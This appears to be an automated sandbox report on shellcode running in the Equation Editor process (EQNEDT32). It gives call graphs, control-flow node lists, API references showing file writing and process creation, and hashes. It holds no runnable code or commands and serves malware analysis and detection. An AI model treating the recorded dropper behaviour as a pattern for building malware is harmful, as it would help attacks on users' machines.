6482->6484 6485 35904a8 19 API calls 6483->6485 6492 35904ba 6484->6492 6486 3590491 6485->6486 6489 35904c4 16 API calls 6486->6489 6486->6492 6487 3590580 5 API calls 6494 3590570 6487->6494 6488 359054f 6490 3590563 7 API calls 6488->6490 6489->6492 6493 3590557 6490->6493 6491 35905d1 6496 35905e0 ExitProcess 6491->6496 6503 3590618 6491->6503 6492->6488 6492->6493 6495 35904bf 6492->6495 6497 3590542 WriteFile 6492->6497 6493->6487 6494->6491 6498 35905a1 3 API calls 6494->6498 6499 35905ea 6494->6499 6495->6344 6497->6492 6500 3590592 6498->6500 6499->6344 6500->6499 6501 35905a0 CreateProcessW 6500->6501 6502 35905dd ExitProcess 6501->6502 6502->6491 6503->6344 6505 359047a 6504->6505 6506 35904a8 19 API calls 6505->6506 6507 3590491 6506->6507 6509 35904c4 16 API calls 6507->6509 6512 35904ba 6507->6512 6508 359054f 6510 3590563 7 API calls 6508->6510 6509->6512 6514 3590557 6510->6514 6511 35904bf 6511->6481 6512->6508 6512->6511 6513 3590542 WriteFile 6512->6513 6513->6512 6515 3590580 5 API calls 6514->6515 6516 3590570 6515->6516 6518 35905a1 3 API calls 6516->6518 6519 35905ea 6516->6519 6523 35905d1 6516->6523 6517 35905e0 ExitProcess 6520 3590592 6518->6520 6519->6481 6520->6519 6521 35905a0 CreateProcessW 6520->6521 6522 35905dd ExitProcess 6521->6522 6522->6523 6523->6517 6524 3590618 6523->6524 6524->6481 6526 35904ea 6525->6526 6527 3590502 10 API calls 6526->6527 6530 35904f2 6527->6530 6528 3590580 5 API calls 6529 3590570 6528->6529 6535 35905a1 3 API calls 6529->6535 6537 35905ea 6529->6537 6541 35905d1 6529->6541 6531 359054f 6530->6531 6534 3590557 6530->6534 6536 3590542 WriteFile 6530->6536 6532 3590563 7 API calls 6531->6532 6532->6534 6533 35905e0 ExitProcess 6534->6528 6538 3590592 6535->6538 6536->6530 6537->6408 6538->6537 6539 35905a0 CreateProcessW 6538->6539 6540 35905dd ExitProcess 6539->6540 6540->6541 6541->6533 6542 3590618 6541->6542 6542->6408 7690 3590071 7691 3590073 7690->7691 7692 35902be 7691->7692 7693 35902d0 66 API calls 7691->7693 7696 3590302 7692->7696 7697 3590367 7692->7697 7702 3590341 7692->7702 7693->7692 7694 359036f 7699 3590372 7694->7699 7700 35903d7 7694->7700 7695 35903d4 7701 35903e8 37 API calls 7695->7701 7703 359038d CreateFileW 7696->7703 7709 3590398 7696->7709 7710 3590326 7696->7710 7698 3590378 45 API calls 7697->7698 7698->7702 7699->7703 7705 359040f 34 API calls 7700->7705 7701->7700 7702->7694 7702->7695 7704 35903af 44 API calls 7703->7704 7712 359039f 7704->7712 7706 35903f5 7705->7706 7707 3590422 7706->7707 7708 3590487 7706->7708 7713 359044e 28 API calls 7707->7713 7729 3590491 7707->7729 7715 35904a8 19 API calls 7708->7715 7708->7729 7711 35903af 44 API calls 7709->7711 7709->7712 7716 3590365 49 API calls 7710->7716 7711->7712 7717 359043c 7713->7717 7714 35904c4 16 API calls 7719 35904ba 7714->7719 7718 359048d 7715->7718 7716->7702 7720 35904e8 7717->7720 7723 3590476 7717->7723 7718->7719 7718->7720 7718->7729 7721 359054f 7719->7721 7722 35904bf 7719->7722 7726 3590542 WriteFile 7719->7726 7728 3590557 7719->7728 7724 3590502 10 API calls 7720->7724 7725 3590563 7 API calls 7721->7725 7727 35904a8 19 API calls 7723->7727 7724->7719 7725->7728 7726->7719 7727->7729 7730 3590580 5 API calls 7728->7730 7729->7714 7729->7719 7732 3590570 7730->7732 7731 35905d1 7733 35905e0 ExitProcess 7731->7733 7739 3590618 7731->7739 7732->7731 7734 35905a1 3 API calls 7732->7734 7735 35905ea 7732->7735 7736 3590592 7734->7736 7736->7735 7737 35905a0 CreateProcessW 7736->7737 7738 35905dd ExitProcess 7737->7738 7738->7731 8140 35900a3 8141 3590083 8140->8141 8142 35900ab 70 API calls 8141->8142 8142->8141 6543 35905e4 GetPEB 6544 35905ec 6543->6544

                                          Callgraph

                                          • Executed
                                          • Not Executed
                                          • Opacity -> Relevance
                                          • Disassembly available
                                          callgraph 0 Function_03590259 4 Function_035905DD 0->4 6 Function_035902D0 0->6 11 Function_0359044E 0->11 14 Function_035904C4 0->14 15 Function_03590378 0->15 24 Function_035903E8 0->24 26 Function_03590563 0->26 27 Function_03590365 0->27 35 Function_0359060C 0->35 36 Function_0359040F 0->36 40 Function_03590580 0->40 41 Function_03590502 0->41 49 Function_035904A8 0->49 53 Function_035903AF 0->53 55 Function_035905A1 0->55 1 Function_0359045B 1->4 1->14 21 Function_03590477 1->21 1->26 1->35 1->40 1->41 1->49 1->55 2 Function_035900DA 2->4 2->6 2->11 2->14 2->15 2->24 2->26 2->27 2->35 2->36 2->40 2->41 2->49 2->53 2->55 3 Function_0359065D 5 Function_035900DD 5->4 5->6 5->11 5->14 5->15 5->24 5->26 5->27 5->35 5->36 5->40 5->41 5->49 5->53 5->55 6->4 6->11 6->14 6->15 22 Function_035902E9 6->22 6->24 6->26 6->27 6->35 6->36 6->40 6->41 6->49 6->53 6->55 7 Function_035900D4 7->4 7->6 7->11 7->14 7->15 7->24 7->26 7->27 7->35 7->36 7->40 7->41 7->49 7->53 7->55 8 Function_03590054 51 Function_035900AB 8->51 9 Function_035900D6 9->4 9->6 9->11 9->14 9->15 9->24 9->26 9->27 9->35 9->36 9->40 9->41 9->49 9->53 9->55 10 Function_035900CA 10->51 11->1 11->4 11->14 11->26 11->35 11->40 11->41 11->49 11->55 12 Function_03590242 13 Function_035903C4 13->4 13->11 13->14 13->24 13->26 13->35 13->36 13->40 13->41 13->49 13->55 14->4 23 Function_035904E8 14->23 14->26 14->35 14->40 14->41 14->55 15->53 16 Function_0359007B 16->4 16->6 16->11 16->14 16->15 16->24 16->26 16->27 16->35 16->36 16->40 16->41 16->49 16->53 16->55 17 Function_035900FA 17->4 17->6 17->11 17->14 17->15 17->24 17->26 17->27 17->35 17->36 17->40 17->41 17->49 17->53 17->55 18 Function_0359007F 18->4 18->6 18->11 18->14 18->15 18->24 18->26 18->27 18->35 18->36 18->40 18->41 18->49 18->53 18->55 19 Function_03590071 19->4 19->6 19->11 19->14 19->15 19->24 19->26 19->27 19->35 19->36 19->40 19->41 19->49 19->53 19->55 20 Function_03590075 20->4 20->6 20->11 20->14 20->15 20->24 20->26 20->27 20->35 20->36 20->40 20->41 20->49 20->53 20->55 21->4 21->14 21->26 21->35 21->40 21->49 21->55 22->3 22->4 22->11 22->14 22->15 22->24 22->26 22->27 22->35 22->36 22->40 22->41 42 Function_03590305 22->42 22->49 22->53 22->55 23->4 23->26 23->35 23->40 23->41 23->55 24->4 24->11 24->14 24->26 24->35 24->36 24->40 24->41 24->49 24->55 25 Function_035900EB 25->4 25->6 25->11 25->14 25->15 25->24 25->26 25->27 25->35 25->36 25->40 25->41 25->49 25->53 25->55 26->4 26->35 26->40 26->55 27->4 27->11 27->14 27->15 27->24 27->26 27->35 27->36 27->40 27->41 27->49 27->53 27->55 28 Function_035905E4 28->35 29 Function_03590098 29->4 29->6 29->11 29->14 29->15 29->24 29->26 29->27 29->35 29->36 29->40 29->41 29->49 29->53 29->55 30 Function_0359009F 30->4 30->6 30->11 30->14 30->15 30->24 30->26 30->27 30->35 30->36 30->40 30->41 30->49 30->53 30->55 31 Function_03590113 31->4 31->6 31->11 31->14 31->15 31->24 31->26 31->27 31->35 31->36 31->40 31->41 31->49 31->53 31->55 32 Function_03590092 32->4 32->6 32->11 32->14 32->15 32->24 32->26 32->27 32->35 32->36 32->40 32->41 32->49 32->53 32->55 33 Function_03590094 33->4 33->6 33->11 33->14 33->15 33->24 33->26 33->27 33->35 33->36 33->40 33->41 33->49 33->53 33->55 34 Function_03590089 34->4 34->6 34->11 34->14 34->15 34->24 34->26 34->27 34->35 34->36 34->40 34->41 34->49 34->53 34->55 36->4 36->11 36->14 36->26 36->35 36->40 36->41 36->49 50 Function_0359042B 36->50 36->55 37 Function_0359008E 37->4 37->6 37->11 37->14 37->15 37->24 37->26 37->27 37->35 37->36 37->40 37->41 37->49 37->53 37->55 38 Function_03590101 38->4 38->6 38->11 38->14 38->15 38->24 38->26 38->27 38->35 38->36 38->40 38->41 38->49 38->53 38->55 39 Function_03590000 40->4 40->35 40->55 41->4 41->26 41->35 41->40 41->55 42->3 42->4 42->11 42->14 42->24 42->26 42->27 42->35 42->36 42->40 42->41 42->49 52 Function_0359032C 42->52 42->53 42->55 43 Function_03590107 43->4 43->6 43->11 43->14 43->15 43->24 43->26 43->27 43->35 43->36 43->40 43->41 43->49 43->53 43->55 44 Function_035900BA 44->51 45 Function_035900B2 45->4 45->6 45->11 45->14 45->15 45->24 45->26 45->27 45->35 45->36 45->40 45->41 45->49 45->53 45->55 46 Function_035900B4 46->4 46->6 46->11 46->14 46->15 46->24 46->26 46->27 46->35 46->36 46->40 46->41 46->49 46->53 46->55 47 Function_035900B6 47->4 47->6 47->11 47->14 47->15 47->24 47->26 47->27 47->35 47->36 47->40 47->41 47->49 47->53 47->55 48 Function_03590136 48->4 48->6 48->11 48->14 48->15 48->24 48->26 48->27 48->35 48->36 48->40 48->41 48->49 48->53 48->55 49->4 49->14 49->26 49->35 49->40 49->55 50->4 50->11 50->14 50->26 50->35 50->40 50->41 50->49 50->55 51->4 51->6 51->11 51->14 51->15 51->24 51->26 51->27 51->35 51->36 51->40 51->41 51->49 51->53 51->55 52->4 52->11 52->14 52->24 52->26 52->27 52->35 52->36 52->40 52->41 52->49 52->53 52->55 53->4 53->11 53->13 53->14 53->24 53->26 53->35 53->36 53->40 53->41 53->49 53->55 54 Function_035900AE 54->4 54->6 54->11 54->14 54->15 54->24 54->26 54->27 54->35 54->36 54->40 54->41 54->49 54->53 54->55 55->4 56 Function_035900A1 56->4 56->6 56->11 56->14 56->15 56->24 56->26 56->27 56->35 56->36 56->40 56->41 56->49 56->53 56->55 57 Function_035900A3 57->51 58 Function_03590123 58->4 58->6 58->11 58->14 58->15 58->24 58->26 58->27 58->35 58->36 58->40 58->41 58->49 58->53 58->55

                                          Executed Functions

                                          Function 035904C4 Relevance: 4.6, APIs: 3, Instructions: 119processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 35904c4-35904d6 call 35904e8 4 35904d8 0->4 5 359053d-359053e 0->5 6 35904da-35904dc 4->6 7 3590553-359055a 4->7 8 3590542-359054d WriteFile 5->8 9 359053f 6->9 10 35904de-35904df 6->10 11 359055c-3590561 7->11 12 3590507-359050c 8->12 13 3590541 9->13 14 3590565-3590574 call 3590580 9->14 10->8 15 35904e1-35904ff call 3590502 10->15 11->14 21 3590512-3590518 12->21 13->8 35 35905d7-35905db 14->35 36 3590576 14->36 26 3590501-3590505 15->26 27 3590562 15->27 24 359051a-359051f 21->24 25 359054f-359055a call 3590563 21->25 29 3590521 24->29 30 3590526-3590539 24->30 25->11 26->12 27->14 29->30 30->5 38 35905dd-35905e2 ExitProcess 35->38 39 3590578 36->39 40 35905ec-35905ef 36->40 42 35905ea 39->42 43 359057a-3590593 call 35905a1 39->43 41 35905f2-35905f4 40->41 45 35905f7-3590603 call 359060c 41->45 42->40 52 35905fa-35905fc call 359060c 43->52 53 3590595-3590596 43->53 45->41 50 3590605-3590609 45->50 56 35905fd-3590603 52->56 55 3590598-3590599 53->55 53->56 57 359059b-359059e 55->57 58 359060a 55->58 56->41 56->50 57->45 59 35905a0-35905cc CreateProcessW call 35905dd 57->59 61 35905d1-35905d4 59->61 63 3590626 61->63 64 35905d6 61->64 67 3590628-359062c 63->67 68 359062e-3590632 63->68 65 35905d8-35905db 64->65 66 3590647-3590649 64->66 65->38 71 3590659-359065a 66->71 67->68 69 359063a-3590641 67->69 68->66 70 3590634-3590638 68->70 72 3590643 69->72 73 3590645 69->73 70->66 70->69 72->66 74 359064b-3590654 73->74 76 359061d-3590620 74->76 77 3590656 74->77 76->74 78 3590622 76->78 77->71 78->63
                                          APIs
                                            • Part of subcall function 035904E8: WriteFile.KERNELBASE(0359043C,03590453,00000000,00000000,00000000,?,03590453,0359043C,00000000,00000000,00000000,00000000,035903F5,00000050,00000000), ref: 0359054B
                                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,03590592,?,03590570), ref: 035905CA
                                          • ExitProcess.KERNELBASE(00000000,?,035905D1,?,03590592,?,03590570,?,?,03590557,00000000,00000000,00000000,00000000,035903F5,00000050), ref: 035905E2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: Process$CreateExitFileWrite
                                          • String ID:
                                          • API String ID: 3739231918-0
                                          • Opcode ID: ecf8aac7c8f5a532ebe00187704931cd21d5dcfcf7f73e5d55e0df0344cecd4e
                                          • Instruction ID: ab80fd62e361bf13975b4a836761c1b68d510960ee618f0de1cd2fbfb8721254
                                          • Opcode Fuzzy Hash: ecf8aac7c8f5a532ebe00187704931cd21d5dcfcf7f73e5d55e0df0344cecd4e
                                          • Instruction Fuzzy Hash: AA31E7B14083415AEF21EAA4E980AAFFB7DFFC1700F188D4FE192470B2D671D5089661
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03590502 Relevance: 4.6, APIs: 3, Instructions: 98processfileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 79 3590502-3590505 81 3590507-3590518 79->81 85 359051a-359051f 81->85 86 359054f-3590574 call 3590563 call 3590580 81->86 87 3590521 85->87 88 3590526-359054d WriteFile 85->88 100 35905d7-35905db 86->100 101 3590576 86->101 87->88 88->81 102 35905dd-35905e2 ExitProcess 100->102 103 3590578 101->103 104 35905ec-35905ef 101->104 106 35905ea 103->106 107 359057a-3590593 call 35905a1 103->107 105 35905f2-35905f4 104->105 109 35905f7-3590603 call 359060c 105->109 106->104 116 35905fa-35905fc call 359060c 107->116 117 3590595-3590596 107->117 109->105 114 3590605-3590609 109->114 120 35905fd-3590603 116->120 119 3590598-3590599 117->119 117->120 121 359059b-359059e 119->121 122 359060a 119->122 120->105 120->114 121->109 123 35905a0-35905cc CreateProcessW call 35905dd 121->123 125 35905d1-35905d4 123->125 127 3590626 125->127 128 35905d6 125->128 131 3590628-359062c 127->131 132 359062e-3590632 127->132 129 35905d8-35905db 128->129 130 3590647-3590649 128->130 129->102 135 3590659-359065a 130->135 131->132 133 359063a-3590641 131->133 132->130 134 3590634-3590638 132->134 136 3590643 133->136 137 3590645 133->137 134->130 134->133 136->130 138 359064b-3590654 137->138 140 359061d-3590620 138->140 141 3590656 138->141 140->138 142 3590622 140->142 141->135 142->127
                                          APIs
                                          • WriteFile.KERNELBASE(0359043C,03590453,00000000,00000000,00000000,?,03590453,0359043C,00000000,00000000,00000000,00000000,035903F5,00000050,00000000), ref: 0359054B
                                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,03590592,?,03590570), ref: 035905CA
                                          • ExitProcess.KERNELBASE(00000000,?,035905D1,?,03590592,?,03590570,?,?,03590557,00000000,00000000,00000000,00000000,035903F5,00000050), ref: 035905E2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: Process$CreateExitFileWrite
                                          • String ID:
                                          • API String ID: 3739231918-0
                                          • Opcode ID: d26a8295f2a3bfc1efaa8aa04e95a18b127ffe2b33cb040d0da394256dcd0fb0
                                          • Instruction ID: 0c9e5a90e30d8a9afa5dda6475775e17688e712700aaee73d2ae3b5f8fe2eac6
                                          • Opcode Fuzzy Hash: d26a8295f2a3bfc1efaa8aa04e95a18b127ffe2b33cb040d0da394256dcd0fb0
                                          • Instruction Fuzzy Hash: 8221A6B540C3455AEF11EB64EC80AAFBB69FFC1700F188D4BF192870B1DA7495089766
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035904E8 Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 143 35904e8-35904ff call 3590502 148 3590501-3590505 143->148 149 3590562 143->149 152 3590507-3590518 148->152 150 3590565-3590574 call 3590580 149->150 162 35905d7-35905db 150->162 163 3590576 150->163 160 359051a-359051f 152->160 161 359054f-3590561 call 3590563 152->161 164 3590521 160->164 165 3590526-359054d WriteFile 160->165 161->150 167 35905dd-35905e2 ExitProcess 162->167 168 3590578 163->168 169 35905ec-35905ef 163->169 164->165 165->152 172 35905ea 168->172 173 359057a-3590593 call 35905a1 168->173 171 35905f2-35905f4 169->171 177 35905f7-3590603 call 359060c 171->177 172->169 186 35905fa-35905fc call 359060c 173->186 187 3590595-3590596 173->187 177->171 184 3590605-3590609 177->184 190 35905fd-3590603 186->190 189 3590598-3590599 187->189 187->190 191 359059b-359059e 189->191 192 359060a 189->192 190->171 190->184 191->177 193 35905a0-35905cc CreateProcessW call 35905dd 191->193 195 35905d1-35905d4 193->195 197 3590626 195->197 198 35905d6 195->198 201 3590628-359062c 197->201 202 359062e-3590632 197->202 199 35905d8-35905db 198->199 200 3590647-3590649 198->200 199->167 205 3590659-359065a 200->205 201->202 203 359063a-3590641 201->203 202->200 204 3590634-3590638 202->204 206 3590643 203->206 207 3590645 203->207 204->200 204->203 206->200 208 359064b-3590654 207->208 210 359061d-3590620 208->210 211 3590656 208->211 210->208 212 3590622 210->212 211->205 212->197
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: Process$CreateExitFileWrite
                                          • String ID:
                                          • API String ID: 3739231918-0
                                          • Opcode ID: ec687970cd5e863647ec71913091ed8e96e7369ce3460fad760adeb2de576102
                                          • Instruction ID: 5b55de56d16d3f77625f288f53082a342a537f7b5e28436e37b017676ccc1085
                                          • Opcode Fuzzy Hash: ec687970cd5e863647ec71913091ed8e96e7369ce3460fad760adeb2de576102
                                          • Instruction Fuzzy Hash: 592188B14083455BEF11EA64DC84FAFF76AFFC1740F188D4EB192470B1DA7595088761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035902D0 Relevance: 3.1, APIs: 2, Instructions: 85COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 213 35902d0-35902f7 ExitProcess call 35902e9 216 359034a-359036d 213->216 217 35902fa-35902ff 213->217 220 359036f-3590370 216->220 221 35903d4-35903e4 call 35903e8 216->221 222 3590302-359031c 217->222 223 3590367-359036d call 3590378 217->223 225 3590372-3590388 220->225 226 35903d7-35903e4 220->226 230 35903eb-3590420 call 359040f 221->230 231 359038d-359039a CreateFileW call 35903af 222->231 239 359031e-3590324 222->239 223->220 223->221 225->231 226->230 240 3590422-3590424 230->240 241 3590487 230->241 238 359039f-35903ad 231->238 244 3590398 239->244 245 3590326-3590349 call 3590365 239->245 246 359049c-359049d 240->246 247 3590427 240->247 249 3590489-3590495 call 35904a8 241->249 250 35904ad-35904bb call 35904c4 241->250 244->238 251 359039a call 35903af 244->251 245->216 253 359049e-35904a0 246->253 254 3590504-3590505 246->254 252 359042a-3590470 call 359044e 247->252 247->253 268 359050b 249->268 276 3590497 249->276 274 35904bd 250->274 275 3590526-359054d WriteFile 250->275 251->238 277 35904e8 252->277 278 3590473 252->278 259 35904a3-35904a5 253->259 260 3590507 254->260 266 359050c-3590518 259->266 267 35904a7-35904ab 259->267 260->268 279 359051a-359051f 266->279 280 359054f-3590561 call 3590563 266->280 267->250 268->266 281 35904bf-35904c8 274->281 282 3590524 274->282 275->260 283 3590499 276->283 284 35904eb-35904ff call 3590502 276->284 285 35904ea 277->285 278->285 286 3590476-359049d call 35904a8 278->286 279->275 287 3590521 279->287 300 3590565-3590574 call 3590580 280->300 282->275 283->246 297 3590501 284->297 298 3590562 284->298 285->284 286->254 302 359049f-35904a0 286->302 287->275 297->254 298->300 307 35905d7-35905db 300->307 308 3590576 300->308 302->259 309 35905dd-35905e2 ExitProcess 307->309 310 3590578 308->310 311 35905ec-35905ef 308->311 313 35905ea 310->313 314 359057a-3590593 call 35905a1 310->314 312 35905f2-35905f4 311->312 316 35905f7-3590603 call 359060c 312->316 313->311 323 35905fa-35905fc call 359060c 314->323 324 3590595-3590596 314->324 316->312 321 3590605-3590609 316->321 327 35905fd-3590603 323->327 326 3590598-3590599 324->326 324->327 328 359059b-359059e 326->328 329 359060a 326->329 327->312 327->321 328->316 330 35905a0-35905d4 CreateProcessW call 35905dd 328->330 334 3590626 330->334 335 35905d6 330->335 338 3590628-359062c 334->338 339 359062e-3590632 334->339 336 35905d8-35905db 335->336 337 3590647-3590649 335->337 336->309 342 3590659-359065a 337->342 338->339 340 359063a-3590641 338->340 339->337 341 3590634-3590638 339->341 343 3590643 340->343 344 3590645 340->344 341->337 341->340 343->337 345 359064b-3590654 344->345 347 359061d-3590620 345->347 348 3590656 345->348 347->345 349 3590622 347->349 348->342 349->334
                                          APIs
                                          • ExitProcess.KERNELBASE(035902BE), ref: 035902D0
                                            • Part of subcall function 035902E9: CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 03590395
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: ea9ceec6a0e7a5b78fbc5f5d5d2948ca6cbcadeb6e9e5a1dbfb5103c10cb95b0
                                          • Instruction ID: 0754cfec5f06aae6eced46fbbe65a2fbd10e2fa03424319cddee2af14c1d54a0
                                          • Opcode Fuzzy Hash: ea9ceec6a0e7a5b78fbc5f5d5d2948ca6cbcadeb6e9e5a1dbfb5103c10cb95b0
                                          • Instruction Fuzzy Hash: F621BF6540D7C05FFB11D7606E9A758BEA0BF4B600F1C8ECB81C58F1F3D2A5A14A9356
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03590563 Relevance: 3.1, APIs: 2, Instructions: 70COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 350 3590563-3590574 call 3590580 356 35905d7-35905db 350->356 357 3590576 350->357 358 35905dd-35905e2 ExitProcess 356->358 359 3590578 357->359 360 35905ec-35905ef 357->360 362 35905ea 359->362 363 359057a-3590593 call 35905a1 359->363 361 35905f2-35905f4 360->361 365 35905f7-3590603 call 359060c 361->365 362->360 372 35905fa-35905fc call 359060c 363->372 373 3590595-3590596 363->373 365->361 370 3590605-3590609 365->370 376 35905fd-3590603 372->376 375 3590598-3590599 373->375 373->376 377 359059b-359059e 375->377 378 359060a 375->378 376->361 376->370 377->365 379 35905a0-35905cc CreateProcessW call 35905dd 377->379 381 35905d1-35905d4 379->381 383 3590626 381->383 384 35905d6 381->384 387 3590628-359062c 383->387 388 359062e-3590632 383->388 385 35905d8-35905db 384->385 386 3590647-3590649 384->386 385->358 391 3590659-359065a 386->391 387->388 389 359063a-3590641 387->389 388->386 390 3590634-3590638 388->390 392 3590643 389->392 393 3590645 389->393 390->386 390->389 392->386 394 359064b-3590654 393->394 396 359061d-3590620 394->396 397 3590656 394->397 396->394 398 3590622 396->398 397->391 398->383
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: Process$CreateExit
                                          • String ID:
                                          • API String ID: 126409537-0
                                          • Opcode ID: 8231ee5b18957d3648bc57fc975aece0ec9b201bd18f6de92825622497ed5a63
                                          • Instruction ID: 67b0d33bb42bece405003d4d012b41b4a33391ecde3dba8f93ae024331834435
                                          • Opcode Fuzzy Hash: 8231ee5b18957d3648bc57fc975aece0ec9b201bd18f6de92825622497ed5a63
                                          • Instruction Fuzzy Hash: 1011E7F04083415BEE21E768EC84B9EFB6AFFC1300F188D4BE1824B0B6CA7485548665
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035905A1 Relevance: 3.1, APIs: 2, Instructions: 56processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 399 35905a1-35905ca CreateProcessW 401 35905d1-35905d4 399->401 402 35905cc call 35905dd 399->402 404 3590626 401->404 405 35905d6 401->405 402->401 408 3590628-359062c 404->408 409 359062e-3590632 404->409 406 35905d8-35905e2 ExitProcess 405->406 407 3590647-3590649 405->407 412 3590659-359065a 407->412 408->409 410 359063a-3590641 408->410 409->407 411 3590634-3590638 409->411 414 3590643 410->414 415 3590645 410->415 411->407 411->410 414->407 416 359064b-3590654 415->416 419 359061d-3590620 416->419 420 3590656 416->420 419->416 421 3590622 419->421 420->412 421->404
                                          APIs
                                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,03590592,?,03590570), ref: 035905CA
                                            • Part of subcall function 035905DD: ExitProcess.KERNELBASE(00000000,?,035905D1,?,03590592,?,03590570,?,?,03590557,00000000,00000000,00000000,00000000,035903F5,00000050), ref: 035905E2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: Process$CreateExit
                                          • String ID:
                                          • API String ID: 126409537-0
                                          • Opcode ID: cc04445753e1ca6f8d30d3611a3f9dac58b0c92c2cdc5dffd7fbd729de51b4ed
                                          • Instruction ID: d527466024da5529aa178f6fcd764473419ba670f666dc310763819c0bdb06d3
                                          • Opcode Fuzzy Hash: cc04445753e1ca6f8d30d3611a3f9dac58b0c92c2cdc5dffd7fbd729de51b4ed
                                          • Instruction Fuzzy Hash: AF01ACA950424251FFB0E668E8447F6B766FBC1700FCC9C5BA486470F5D76451C3C6E9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03590580 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 422 3590580-3590593 call 35905a1 427 35905fa-35905fc call 359060c 422->427 428 3590595-3590596 422->428 431 35905fd-3590603 427->431 430 3590598-3590599 428->430 428->431 432 359059b-359059e 430->432 433 359060a 430->433 434 35905f2-35905f4 431->434 435 3590605-3590609 431->435 436 35905a0-35905d4 CreateProcessW call 35905dd 432->436 437 35905f7-3590603 call 359060c 432->437 434->437 443 3590626 436->443 444 35905d6 436->444 437->434 437->435 447 3590628-359062c 443->447 448 359062e-3590632 443->448 445 35905d8-35905e2 ExitProcess 444->445 446 3590647-3590649 444->446 451 3590659-359065a 446->451 447->448 449 359063a-3590641 447->449 448->446 450 3590634-3590638 448->450 453 3590643 449->453 454 3590645 449->454 450->446 450->449 453->446 455 359064b-3590654 454->455 458 359061d-3590620 455->458 459 3590656 455->459 458->455 460 3590622 458->460 459->451 460->443
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: Process$CreateExit
                                          • String ID:
                                          • API String ID: 126409537-0
                                          • Opcode ID: ab6099e50a1536c03818295e56c65e109917f17f6d534d6b5d930f748458d395
                                          • Instruction ID: 669c1078489991c14b67652fddc60cdde03050fad4635b2da2257d4e2ac6fc77
                                          • Opcode Fuzzy Hash: ab6099e50a1536c03818295e56c65e109917f17f6d534d6b5d930f748458d395
                                          • Instruction Fuzzy Hash: B601A2F64083416AEF11E7A8EC84FABB76DFFC0300F488C4BA1568B0B1DA74955586A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03590259 Relevance: 1.6, APIs: 1, Instructions: 147fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
